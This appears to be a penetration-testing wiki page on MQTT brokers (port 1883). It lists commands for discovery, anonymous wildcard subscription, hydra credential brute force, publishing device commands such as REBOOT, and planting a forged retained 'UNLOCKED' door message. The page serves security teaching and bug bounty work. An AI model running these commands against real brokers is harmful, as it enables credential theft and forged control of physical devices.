MQTT (Message Queuing Telemetry Transport) - Port 1883
Become VeryLazyTech member! π
Follow us on:
β Twitter @VeryLazyTech.
πΎ Github @VeryLazyTech.
π Medium @VeryLazyTech.
πΊ YouTube @VeryLazyTech.
π© Telegram @VeryLazyTech.
π΅οΈββοΈ My Site @VeryLazyTech.
Visit our shop for e-books and courses. π
Basic info
MQTT (Message Queuing Telemetry Transport) is a lightweight messaging protocol for IoT devices, using a publish-subscribe model over TCP/IP. The most popular open-source broker implementation is Mosquitto. Due to minimal configuration and often insecure deployments, MQTT services are frequently vulnerable to attack.
Key characteristics:
Default port: TCP 1883 (unencrypted), 8883 (TLS)
Stateless pub/sub model
Authentication optional
Wildcard topics and retained messages
Discovering MQTT Services via Network Scanning
Nmap Detection of MQTT Brokers
Scan for MQTT using service and version detection:
nmap -sV -p 1883,8883 --script mqtt-subscribe <target-ip>Useful Nmap NSE scripts:
mqtt-subscribe.nseβ connects and subscribes to common topicsmqtt-connect.nseβ attempts anonymous authentication
Manual Enumeration with Netcat or Telnet
telnet <target-ip> 1883A successful connection banner or acknowledgment byte from the broker confirms its presence.
Assessing Authentication and Authorization Mechanisms
Many MQTT brokers allow anonymous access by default. Check this using mosquitto_sub:
mosquitto_sub -h <target-ip> -t '#' -vIf the broker allows wildcard topic subscription without credentials, it is misconfigured and vulnerable.
Try authentication bypass:
mosquitto_sub -h <target-ip> -t '#' -v -u test -P testExploiting Publish and Subscribe for Information Disclosure
Read All Topics with Wildcards
mosquitto_sub -h <target-ip> -t '#' -vThis reveals:
Sensor values
Credentials sent by devices
Internal control commands
Presence of retained messages
Publishing Arbitrary Payloads
mosquitto_pub -h <target-ip> -t 'iot/device/command' -m 'REBOOT'This could trigger real-world actions on connected devices if the topic is subscribed.
Brute Forcing MQTT Credentials
Use hydra for credential brute-force:
hydra -L users.txt -P passwords.txt mqtt://<target-ip>:1883 -VPersistent Attacks with Retained Messages
Retained messages persist even after the publisher disconnects, making them ideal for:
Persistence payloads
Credential harvesting
Fake sensor data injection
Set retained payload:
mosquitto_pub -h <target-ip> -t 'iot/door/status' -m 'UNLOCKED' -rWhen a new subscriber connects, it immediately receives the forged message.
Learn & practice For the Bug Bounty
Last updated
Was this helpful?